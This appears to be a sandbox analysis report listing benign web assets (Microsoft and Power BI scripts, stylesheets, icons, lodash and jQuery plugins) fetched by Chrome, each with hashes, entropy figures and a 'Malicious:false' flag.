                                                                                                                                                                                                          Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1748
                                                                                                                                                                                                          Entropy (8bit):3.996779045636375
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:tPnRGKuJfEk5V8vIUSBPVMHlni0YWdjoz2koyHuNTMbuia8w6EvH5MmArh7SUimg:hRGM1QPVoi0Pzh4Ef5P2biCee02l0jz
                                                                                                                                                                                                          MD5:DC1E0183B38AC7A568B97DF4FBAE12E5
                                                                                                                                                                                                          SHA1:710E6D103C5EBD066A299F7E09E8F6E152F20351
                                                                                                                                                                                                          SHA-256:E7D5E26B96D1C3FF0A8829E603A299637FE62D1F280547E7DBB8126CB9FEF323
                                                                                                                                                                                                          SHA-512:1ADC9D87631B8454CAA9C5557E7CD4D5C51B8C7F335FBA88AC32BBDECD5A09518B53D77AB79A4B6BAFED0F31362FAB28BF2444AFC37EDE6DE4BCCFCCBFC4FEC4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                          Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4.65065 0.5H12.684C15.068 0.5 17.0007 2.43264 17.0007 4.81667V5C17.0007 5.46024 16.6276 5.83333 16.1673 5.83333C15.7071 5.83333 15.334 5.46024 15.334 5V4.81667C15.334 3.35311 14.1475 2.16667 12.684 2.16667H4.65065C3.1871 2.16667 2.00065 3.35311 2.00065 4.81667V12.85C2.00065 14.3136 3.1871 15.5 4.65065 15.5H12.3944C12.7079 13.7933 14.2033 12.5 16.0007 12.5C18.0257 12.5 19.6673 14.1416 19.6673 16.1667C19.6673 18.1917 18.0257 19.8333 16.0007 19.8333C14.3223 19.8333 12.9073 18.7057 12.472 17.1667H4.65065C2.26662 17.1667 0.333984 15.234 0.333984 12.85V4.81667C0.333984 2.43264 2.26662 0.5 4.65065 0.5ZM14.0007 16.1667C14.0007 17.2712 14.8961 18.1667 16.0007 18.1667C17.1052 18.1667 18.0007 17.2712 18.0007 16.1667C18.0007 15.0621 17.1052 14.1667 16.0007 14.1667C14.8961 14.1667 14.0007 15.0621 14.0007 16.1667ZM7.66732 20.3333V20C7.66732 19.5398 8.04041 19.1667 8.50065 19.1667C8.96089 19.1667
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (505)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1418
                                                                                                                                                                                                          Entropy (8bit):5.418786110345074
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                                                                                                          MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                                                                                          SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                                                                                          SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                                                                                          SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:HSinYn:xY
                                                                                                                                                                                                          MD5:F7D59D3BE131AD16CC24D036112D9991
                                                                                                                                                                                                          SHA1:635B8DB4843997BA0331C4C0EDDD2601F4F69698
                                                                                                                                                                                                          SHA-256:57CCDE9F4BE6E3F510E37BEFB67BA272AB6D263980802EA18C18F3B78B3DAB32
                                                                                                                                                                                                          SHA-512:1446489C33DA980A237731A984D9FD017475CC0BA4C022DE45571A1AD4F295860717712DB60E6EA3E1F79ABB0C8EB7F1B15C5FB05E436D170E94B8740DFBF595
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl6FOrww_o4BxIFDXhvEhk=?alt=proto
                                                                                                                                                                                                          Preview:CgkKBw14bxIZGgA=
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4143), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):73972
                                                                                                                                                                                                          Entropy (8bit):5.358443959593022
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:tiWlPegosdkA/XrCqHWNC8GnqwhteZgDruFv:tiIV6N7GZhteZuKv
                                                                                                                                                                                                          MD5:F0ECF23EB203DB253FF4FE76CCF3E634
                                                                                                                                                                                                          SHA1:1F04F34657610A03812AA06F9C7FDFA511D21C05
                                                                                                                                                                                                          SHA-256:53F5A4F91EA1041AEE333E666E7E5DE3F2A329189B0A121852CFBA3FD01C46A5
                                                                                                                                                                                                          SHA-512:A69B4EB7D4CD8EAA5CCA3854359674CD53A1D6DA5D0CCF48DBABAC1BED43EAC08F8F019532BBFB56596A96AD103BC93C774F0293589A6FD11E9214C6883A96A4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/lodash.bundle.min.1f04f34657610a03812a.js
                                                                                                                                                                                                          Preview:.this.parseTimeMarkers = this.parseTimeMarkers || {};.var marker = this.parseTimeMarkers['lodash.bundle.min.js'] || (this.parseTimeMarkers['lodash.bundle.min.js'] = {});.marker.startEval = window.jsCommon && window.jsCommon.performance && window.jsCommon.performance.now ? window.jsCommon.performance.now() : Date.now(); marker.isExternal = false;.if (window.perfTracking && window.perfTracking.startBundleEval) window.perfTracking.startBundleEval('lodash.bundle.min.js');/**.. * @license.. * Lodash <https://lodash.com/>.. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>.. * Released under MIT license <https://lodash.com/license>.. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>.. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors.. */..(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.ap
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):895
                                                                                                                                                                                                          Entropy (8bit):6.895312397985107
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:+cKYj6LHOzVDnvg2hqSL6tEpx255W/ZIVQ/K5Ooyc:+cKYjwHO9YYqSLjwYJC0c
                                                                                                                                                                                                          MD5:4936025ADF3ED79BC8C13DD73536C196
                                                                                                                                                                                                          SHA1:8AF30A13623376FB2135765CA9C78F87E5AB08F0
                                                                                                                                                                                                          SHA-256:2C436C6BACD825C981C6FADF6B92D2B3B0E808C9AD56430489119F70FB8E9C40
                                                                                                                                                                                                          SHA-512:E2C33AD4F9F1F07D8B124A59B4F58E0FCB53FE6A045DB5094EE453657C48F3D4F4CA1D15CC7172599B55757326A48509D9CD7B1AC0BF36FC83584E248C21C113
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_YT?scl=1
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................e...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................mmdat.......?.@CA.2..D........y.x.25...\3...MB.ko...*..0.>._W"&.....@Q...................!s.l...Wk:.j...`;mL^5@'q..[Uz#.Q.~.M=.3.].I.M....G..`.C.j...L..f8 slW...8w.....q....~.@.R.7.&.3.L.. .qs.....(.jr.]..m.\....u.s..R..[..7. s...."*k.\v.....t....r...0.W4.S....zg...N.i&..ML7....."Q...R..@jD......k2KN.;2JWa.<L0..u.u..=_45z..0(.....}`=.....9.~...v...T....5.};......7M.U...]n..(s..x.0x.O.c..'(D..v."78K...|w...*........&..I.r->q...o.5..&....L........j....\..1..0...tJ...U......[9=.....................9..S.d7.....X..Q.4#B..^..dC.b.,.I.+`..r..o..b.....I'..M...J'...F'.*........!.%g..~..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4337), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):4337
                                                                                                                                                                                                          Entropy (8bit):5.003747588753127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:oQTW/6JCeJv3GQ23m6O9p8x8dLpm+lYA8d+i9xjKk7qRugHJZs+eMBM0M1H/:ookK23KlKpfOUTuvi
                                                                                                                                                                                                          MD5:89FB640FDA0DED197D46505574AA2C76
                                                                                                                                                                                                          SHA1:A2BD4024265B5D6E8C59C8BEDD2D924DEB753890
                                                                                                                                                                                                          SHA-256:A6300CC2B6B75C08D0B0ECF317E4A20E60321674819F616D8112B97B655411DB
                                                                                                                                                                                                          SHA-512:EC7D3A9F9A7FEAF79828C987ADA50745B9E030309463F5849E2B4A67756B7E75304CCE3C703F5A48515AAFB897328E3E3148F5927CB26EAFDC6D243289DE9325
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/InfoNav.Common.min.a2bd4024265b5d6e8c59.css
                                                                                                                                                                                                          Preview:::-ms-clear{display:none}.ui-widget{font-family:Segoe UI,Segoe,Tahoma,Helvetica,Arial,sans-serif}.hidden{display:none}.infonav-errorInfoHeader{font-weight:700;margin-right:10px}.infonav-errorTitle{margin-bottom:20px}.infonav-errorDetail{color:gray;margin-bottom:20px}.infonav-modalContainer{display:none;position:absolute;height:100%;width:100%;top:0;left:0;background-color:rgba(255,255,255,.65);z-index:300;font-family:Segoe UI,Segoe,Tahoma,Helvetica,Arial,sans-serif;font-size:14px}.infonav-modalContainer .infonav-linkIcon{margin-left:5px;vertical-align:sub}.infonav-modalContainer .trial-success-dialog{max-width:540px;color:var(--gray-180,#252423)}.infonav-modalContainer .trial-success-dialog .infonav-dialogContent{padding:10px 0}.infonav-modalContainer .trial-success-dialog .infonav-dialogTitle{font-weight:600;font-size:20px}.infonav-modalContainer .infonav-modalDialog{position:absolute;top:50%;left:50%;width:750px;background:var(--white-color,#fff);border:var(--neutral-tertiary-color,#
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):4565
                                                                                                                                                                                                          Entropy (8bit):7.879534543139402
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                                                                                                          MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                                                                                          SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                                                                                          SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                                                                                          SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                                                                                                          Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):304858
                                                                                                                                                                                                          Entropy (8bit):5.098842090973851
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:6kc1b3b99G9gR7N1xf6iKyqsNHHlYXklLHdkmBHV6ysv9S/NYWme0QWufThQWB3Q:x8vfThQ
                                                                                                                                                                                                          MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                                                                                                                                                          SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                                                                                                                                                          SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                                                                                                                                                          SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                                                                                                                                                          Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):786
                                                                                                                                                                                                          Entropy (8bit):5.063005301080572
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:wD7XG68tgyGRo9f+NtCOILcGbtKLYgkZrGJqN7AA7no7Nzfg:YKbfMQpZZreg8CApg
                                                                                                                                                                                                          MD5:6804C4E377A65E8D110018A28B97C035
                                                                                                                                                                                                          SHA1:07CA294F77F622A072A5B2CE1C2C14C3627A389F
                                                                                                                                                                                                          SHA-256:3B271325E90DDB188A858500B4939D6D4BBC0E28720DA2C486266704C715A8DB
                                                                                                                                                                                                          SHA-512:87AC94038D518F3A1321388131304C414A6B00789C905DFA981902B344C2C711C35B7149E2CCD37514C3FA5A90594463F01D6364FB972606E5209F2FFDDED777
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.globalize/globalize.culture.en-US.07ca294f77f622a072a5.js
                                                                                                                                                                                                          Preview:/*.. * Globalize Culture en-US.. *.. * http://github.com/jquery/globalize.. *.. * Copyright Software Freedom Conservancy, Inc... * Dual licensed under the MIT or GPL Version 2 licenses... * http://jquery.org/license.. *.. * This file was generated by the Globalize Culture Generator.. * Translation: bugs found in this file need to be fixed in the generator.. */....(function( window, undefined ) {....var Globalize;....if ( typeof require !== "undefined" &&...typeof exports !== "undefined" &&...typeof module !== "undefined" ) {...// Assume CommonJS...Globalize = require( "globalize" );..} else {...// Global variable...Globalize = window.Globalize;..}....Globalize.addCultureInfo( "en-US", "default", {...name: "en-US",...englishName: "English (United States)"..});....}( this ));..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1242), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):17782
                                                                                                                                                                                                          Entropy (8bit):5.181737540230788
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:NMXgeR3RWW3wYxmypxo/BJJj1zsbU1tnFnjhkgczTVLl:N2gedgYxmMxo/BJJZzsbU1tnFnjhkgc/
                                                                                                                                                                                                          MD5:ADC05131CD9DDC552AD359D24C803E1D
                                                                                                                                                                                                          SHA1:3165522F10C4913A08ED7DE9433F890BED271999
                                                                                                                                                                                                          SHA-256:9B07A94E6E206450B90128EAF1C2C56E82DC181026F363148E2EA4D1D3A2768E
                                                                                                                                                                                                          SHA-512:260F349EAC9A2950087F9759F625BA407DA08470E20A1570991A75A60411D3F363909E677ECB6FC867E81C092DF048049491722213E82BC1E8D42A33678B15D7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://app.powerbi.com/favicon.ico
                                                                                                                                                                                                          Preview:..<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml" >.. <head>.. <title>Power BI Error</title>.. <meta http-equiv="X-UA-Compatible" content="IE=edge;" />.... <meta charset="utf-8">.. <meta name="description" content="">.. <meta name="format-detection" content="telephone=no" />.. <link rel="shortcut icon" href="/images/PowerBI_Favicon.ico" />.. .. Please do not add any script before this line -->.. <script> function cdnFallback(event) {var date = new Date(); var failedRequestUrl = 'unknown'; var sessionSource = 'unknown'; var statusCode = 'unknown'; var durationMs = 'unknown'; var maxAgeInSeconds = 8 * 60 * 60;if (event && event.currentTarget && event.currentTarget.src) {failedRequestUrl = event.currentTarget.src;}if (failedRequestUrl && typeof this.performance.getEntriesByName === 'function' && this.performance.getEntriesByName(failedRequestUrl)[0]) {statusCode = this.performance.getEntriesByName(failedRequestUrl)
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22793), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22793
                                                                                                                                                                                                          Entropy (8bit):5.31974440911933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:Yv8n+Mf4QeX2rFac+vco1gg/om/Cq49AlNdYANx2lcPXiFsSSNZSiHNcChg9ri:g2+VIevco1gg/om8JyxUcPyFsTNIiHNl
                                                                                                                                                                                                          MD5:9A2DD9E848F1510A9C96FD894C1A2CF7
                                                                                                                                                                                                          SHA1:07BEB954417FA67AD27460D7DDDD19817DD58713
                                                                                                                                                                                                          SHA-256:CB570D89C96442B7E63C6C0B079457C30C783E79204AEF0A16023CA44705E8FC
                                                                                                                                                                                                          SHA-512:DD97D4260483F57352A899783A386225B75F1E37A0D89E719C1F9EB46925815C465314D46A5007E66A5393B2E005518C0A599589DF3EA281AA803C9027F4A517
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:"use strict";var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["powerBIWebBootstrap.js"]||(this.parseTimeMarkers["powerBIWebBootstrap.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("powerBIWebBootstrap.js"),function(){var R={d:function(e,n){for(var t in n)R.o(n,t)&&!R.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:n[t]})},o:function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},r:function(e){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}};!function(){if(typeof R<"u"){var e=R.u,n=R.e,t=new Map,a=new Map;R.u=function(o){return e(o)+(t.has(o)?"?"+t.get(o):"")},R.e=function(o){return n(o).catch(function(s){var p=a.has(o)?a.get(o):5;if(p<1){var f=e(o
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1722
                                                                                                                                                                                                          Entropy (8bit):4.020777473199425
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:gxQF2rOlB551EzolUXePr7KXqxCz5RzArO:XFYOD551EMS+3UqxCX/
                                                                                                                                                                                                          MD5:F6C2E173ED03C4D085455D33742E305C
                                                                                                                                                                                                          SHA1:99DB9C3858FC6F9CF161485E45FC0A096CB493B2
                                                                                                                                                                                                          SHA-256:2D31B49D3A36A6164F2F57161B0F66C49BD0EC8025EDFA960179A8E0E3249E77
                                                                                                                                                                                                          SHA-512:386D931FDFF9B16E66FE37AF4FA8D96F18618BA77F584A2EBF7C75B87007F6B35999EA4393FF11CEC05FB2BA3E04442E04F8E5D15EEF5BC16E6125869D6123B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="24" height="25" viewBox="0 0 24 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M12.1129 2.12168C8.88107 2.12168 6.26114 4.73546 6.26114 7.95972C6.26114 9.52666 6.87992 10.9494 7.88699 11.998V12.2755C7.23972 12.119 6.58876 12.104 5.96786 12.2109C5.12795 11.0048 4.63565 9.53962 4.63565 7.95972C4.63565 3.83983 7.98334 0.5 12.1129 0.5C16.2425 0.5 19.5902 3.83983 19.5902 7.95972C19.5902 8.94012 19.4006 9.87635 19.056 10.7339C18.991 10.7173 18.9253 10.7018 18.8589 10.6876L17.4382 10.3834C17.7763 9.64514 17.9647 8.82438 17.9647 7.95972C17.9647 4.73546 15.3448 2.12168 12.1129 2.12168ZM10.8126 7.95972C10.8126 7.24322 11.3948 6.66238 12.113 6.66238C12.8312 6.66238 13.4134 7.24322 13.4134 7.95972V11.8517C13.4134 12.234 13.681 12.5643 14.0556 12.6445L18.2446 13.5416C19.4318 13.7959 20.1606 14.9937 19.8386 16.1618L18.3465 21.5759C18.2236 22.0217 17.8421 22.3486 17.3818 22.4024L13.3227 22.8768C13.2886 22.8808 13.2421 22.8747 13.1825 22.8364C13.1194 22.7957 13.0552 22.7259 1
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (541)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3642
                                                                                                                                                                                                          Entropy (8bit):5.399452635270733
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                                                                                                          MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                                                                                          SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                                                                                          SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                                                                                          SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                                                                                          Malicious:false
